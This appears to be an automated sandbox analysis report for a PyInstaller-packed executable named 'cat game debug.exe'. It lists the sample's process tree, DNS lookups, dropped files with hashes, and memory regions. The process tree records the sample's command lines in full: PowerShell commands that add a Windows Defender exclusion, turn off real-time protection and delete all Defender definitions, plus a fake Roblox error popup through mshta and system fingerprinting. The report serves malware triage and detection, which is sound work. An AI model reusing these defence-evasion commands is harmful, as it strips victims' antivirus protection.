| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-fci4h.in | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI17162\python310.dll
| MD5 | 4a6afa2200b1918c413d511c5a3c041c |
| SHA1 | 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3 |
| SHA256 | bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da |
| SHA512 | dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/912-29-0x00007FFE1DBA0000-0x00007FFE1E006000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17162\base_library.zip
| MD5 | 483d9675ef53a13327e7dfc7d09f23fe |
| SHA1 | 2378f1db6292cd8dc4ad95763a42ad49aeb11337 |
| SHA256 | 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e |
| SHA512 | f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_ctypes.pyd
| MD5 | 31859b9a99a29127c4236968b87dbcbb |
| SHA1 | 29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5 |
| SHA256 | 644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713 |
| SHA512 | fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a |
memory/912-34-0x00007FFE33FB0000-0x00007FFE33FD4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17162\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_ssl.pyd
| MD5 | 9a7ab96204e505c760921b98e259a572 |
| SHA1 | 39226c222d3c439a03eac8f72b527a7704124a87 |
| SHA256 | cae09bbbb12aa339fd9226698e7c7f003a26a95390c7dc3a2d71a1e540508644 |
| SHA512 | 0f5f58fb47379b829ee70c631b3e107cde6a69dc64e4c993fb281f2d5ada926405ce29ea8b1f4f87ed14610e18133932c7273a1aa209a0394cc6332f2aba7e58 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_sqlite3.pyd
| MD5 | 70a7050387359a0fab75b042256b371f |
| SHA1 | 5ffc6dfbaddb6829b1bfd478effb4917d42dff85 |
| SHA256 | e168a1e229f57248253ead19f60802b25dc0dbc717c9776e157b8878d2ca4f3d |
| SHA512 | 154fd26d4ca1e6a85e3b84ce9794a9d1ef6957c3bba280d666686a0f14aa571aaec20baa0e869a78d4669f1f28ea333c0e9e4d3ecd51b25d34e46a0ef74ee735 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_socket.pyd
| MD5 | 49f87aec74fea76792972022f6715c4d |
| SHA1 | ed1402bb0c80b36956ec9baf750b96c7593911bd |
| SHA256 | 5d8c8186df42633679d6236c1febf93db26405c1706f9b5d767feab440ea38b0 |
| SHA512 | de58d69228395827547e07695f70ef98cdaf041ebaae0c3686246209254f0336a589b58d44b7776ccae24a5bc03b9dc8354c768170b1771855f342eecc5fead4 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_queue.pyd
| MD5 | bebc7743e8af7a812908fcb4cdd39168 |
| SHA1 | 00e9056e76c3f9b2a9baba683eaa52ecfa367edb |
| SHA256 | cc275b2b053410c6391339149baf5b58df121a915d18b889f184be02bedaf9bc |
| SHA512 | c56496c6396b8c3ec5ec52542061b2146ea80d986dfe13b0d4feb7b5953c80663e34ccd7b7ee99c4344352492be93f7d31f7830ec9ec2ca8a0c2055cb18fa8db |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_lzma.pyd
| MD5 | 864b22495372fa4d8b18e1c535962ae2 |
| SHA1 | 8cfaee73b7690b9731303199e3ed187b1c046a85 |
| SHA256 | fc57bd20b6b128afa5faaac1fd0ce783031faaf39f71b58c9cacf87a16f3325f |
| SHA512 | 9f26fe88aca42c80eb39153708b2315a4154204fc423ca474860072dd68ccc00b7081e8adb87ef9a26b9f64cd2f4334f64bc2f732cd47e3f44f6cf9cc16fa187 |
memory/912-52-0x00007FFE31860000-0x00007FFE3186F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_hashlib.pyd
| MD5 | 659a5efa39a45c204ada71e1660a7226 |
| SHA1 | 1a347593fca4f914cfc4231dc5f163ae6f6e9ce0 |
| SHA256 | b16c0cc3baa67246d8f44138c6105d66538e54d0afb999f446cae58ac83ef078 |
| SHA512 | 386626b3bad58b450b8b97c6ba51ce87378cddf7f574326625a03c239aa83c33f4d824d3b8856715f413cfb9238d23f802f598084dbd8c73c8f6c61275fdecb5 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_decimal.pyd
| MD5 | 7cdc590ac9b4ffa52c8223823b648e5c |
| SHA1 | c8d9233acbff981d96c27f188fcde0e98cdcb27c |
| SHA256 | f281bd8219b4b0655e9c3a5516fe0b36e44c28b0ac9170028dd052ca234c357c |
| SHA512 | 919c36be05f5f94ec84e68ecca43c7d43acb8137a043cf429a9e995643ca69c4c101775955e36c15f844f64fc303999da0cbfe5e121eb5b3ffb7d70e3cd08e0b |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_bz2.pyd
| MD5 | fba120a94a072459011133da3a989db2 |
| SHA1 | 6568b3e9e993c7e993a699505339bbebb5db6fb0 |
| SHA256 | 055a93c8b127dc840ac40ca70d4b0246ac88c9cde1ef99267bbe904086e0b7d3 |
| SHA512 | 221b5a2a9de1133e2866b39f493a822060d3fb85f8c844c116f64878b9b112e8085e61d450053d859a63450d1292c13bd7ec38b89fe2dfa6684ac94e090ec3aa |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\unicodedata.pyd
| MD5 | c697dc94bdf07a57d84c7c3aa96a2991 |
| SHA1 | 641106acd3f51e6db1d51aa2e4d4e79cf71dc1ab |
| SHA256 | 58605600fdaafbc0052a4c1eb92f68005307554cf5ad04c226c320a1c14f789e |
| SHA512 | 4f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\sqlite3.dll
| MD5 | 0c4996047b6efda770b03f8f231e39b8 |
| SHA1 | dffcabcd4e950cc8ee94c313f1a59e3021a0ad48 |
| SHA256 | 983f31bc687e0537d6028a9a65f4825cc560bbf3cb3eb0d3c0fcc2238219b5ed |
| SHA512 | 112773b83b5b4b71007f2668b0344bf45db03bbe1f97ae738615f3c4e2f8afb54b3ae095ea1131bf858ddfb1e585389658af5db56561609a154ae6bb80dc79ba |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\select.pyd
| MD5 | b6de7c98e66bde6ecffbf0a1397a6b90 |
| SHA1 | 63823ef106e8fd9ea69af01d8fe474230596c882 |
| SHA256 | 84b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c |
| SHA512 | 1fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\libssl-1_1.dll
| MD5 | ad0a2b4286a43a0ef05f452667e656db |
| SHA1 | a8835ca75768b5756aa2445ca33b16e18ceacb77 |
| SHA256 | 2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1 |
| SHA512 | cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\libcrypto-1_1.dll
| MD5 | bbc1fcb5792f226c82e3e958948cb3c3 |
| SHA1 | 4d25857bcf0651d90725d4fb8db03ccada6540c3 |
| SHA256 | 9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47 |
| SHA512 | 3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d |
C:\Users\Admin\AppData\Local\Temp\_MEI17162\blank.aes
| MD5 | 705023b823cb30d35ab5f90488394f37 |
| SHA1 | 61d5de747c068c2c35132c74ad9eb2e084f60ffd |
| SHA256 | 67286f4a3d187836bc1cac1aa3997973d3fa2fa797d84167c1822673efe6c30a |
| SHA512 | 86f3b758e7a82b60a52f028930ea1da939f6f03f9f8c88c9a42412e3422b4b7e07d1b460eb189a38a90ae5d283b70ebae0c3b0e5f4d62f57f2d8a2212683376b |
memory/912-58-0x00007FFE30750000-0x00007FFE3077C000-memory.dmp
memory/912-61-0x00007FFE31750000-0x00007FFE31768000-memory.dmp
memory/912-62-0x00007FFE30730000-0x00007FFE3074F000-memory.dmp
memory/912-64-0x00007FFE305B0000-0x00007FFE3072A000-memory.dmp
memory/912-66-0x00007FFE30590000-0x00007FFE305A9000-memory.dmp
memory/912-68-0x00007FFE30580000-0x00007FFE3058D000-memory.dmp
memory/912-70-0x00007FFE30550000-0x00007FFE3057E000-memory.dmp
memory/912-76-0x00007FFE1DBA0000-0x00007FFE1E006000-memory.dmp
memory/912-77-0x00007FFE2C840000-0x00007FFE2CBB9000-memory.dmp
memory/912-75-0x0000022B560F0000-0x0000022B56469000-memory.dmp
memory/912-74-0x00007FFE2D120000-0x00007FFE2D1D8000-memory.dmp
memory/912-80-0x00007FFE2D780000-0x00007FFE2D795000-memory.dmp
memory/912-79-0x00007FFE33FB0000-0x00007FFE33FD4000-memory.dmp
memory/912-82-0x00007FFE30540000-0x00007FFE3054D000-memory.dmp
memory/912-84-0x00007FFE2BEA0000-0x00007FFE2BFB8000-memory.dmp
memory/3528-89-0x000002313B1B0000-0x000002313B1D2000-memory.dmp
memory/3528-97-0x0000023153470000-0x00000231534E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nu4zjrdn.le1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/912-197-0x00007FFE2C840000-0x00007FFE2CBB9000-memory.dmp
memory/912-204-0x00007FFE30750000-0x00007FFE3077C000-memory.dmp
memory/912-210-0x00007FFE30550000-0x00007FFE3057E000-memory.dmp
memory/912-209-0x00007FFE30580000-0x00007FFE3058D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI17162\blank.aes
| MD5 | 13fb9576070298209d2100ef92b80dc4 |
| SHA1 | acdd65435368259540ad727b8a13f2603ad06b9a |
| SHA256 | 6be6e92efffe0e4eadb58fb6d0d4c3766eebf349f4c67bb16bb1cd7911efa557 |
| SHA512 | ca07183df12196799381b31eb6c539adc4489b2ae9ed32c85a56e22a54eb10cb0a740ef85bcf1787b13ef2ad6766ba85049daafce4f5bac2b6f12bb563955580 |
memory/912-208-0x00007FFE30590000-0x00007FFE305A9000-memory.dmp
memory/912-207-0x00007FFE305B0000-0x00007FFE3072A000-memory.dmp
memory/912-206-0x00007FFE30730000-0x00007FFE3074F000-memory.dmp
memory/912-205-0x00007FFE31750000-0x00007FFE31768000-memory.dmp
memory/912-203-0x00007FFE31860000-0x00007FFE3186F000-memory.dmp
memory/912-202-0x00007FFE33FB0000-0x00007FFE33FD4000-memory.dmp
memory/912-201-0x00007FFE1DBA0000-0x00007FFE1E006000-memory.dmp
memory/912-200-0x00007FFE2BEA0000-0x00007FFE2BFB8000-memory.dmp
memory/912-199-0x00007FFE30540000-0x00007FFE3054D000-memory.dmp
memory/912-198-0x00007FFE2D780000-0x00007FFE2D795000-memory.dmp
memory/912-196-0x00007FFE2D120000-0x00007FFE2D1D8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 30b0e71b3e3bb83d35dc1b866044bc18 |
| SHA1 | 5c58470393c7a5a733c17fc66eb1d494efe2d7be |
| SHA256 | b32d45d53d83dc1b39e2c7f6ae1a4b7fa2298d45457c4ffa15a803d9ce00eb0f |
| SHA512 | 7c0ae4e98fff2366fa96a82df82b760d4f54bfe55186ea36ab214802c361828b38bebb9aa7b0802c219bee0cb450c97b175276e62b0759fa2512a9ab8dc5cc9d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | cd5b15b46b9fe0d89c2b8d351c303d2a |
| SHA1 | e1d30a8f98585e20c709732c013e926c7078a3c2 |
| SHA256 | 0a8a0dcbec27e07c8dc9ef31622ac41591871416ccd9146f40d8cc9a2421da7a |
| SHA512 | d7261b2ff89adcdb909b775c6a47b3cd366b7c3f5cbb4f60428e849582c93e14e76d7dcadec79003eef7c9a3059e305d5e4f6b5b912b9ebc3518e06b0d284dd7 |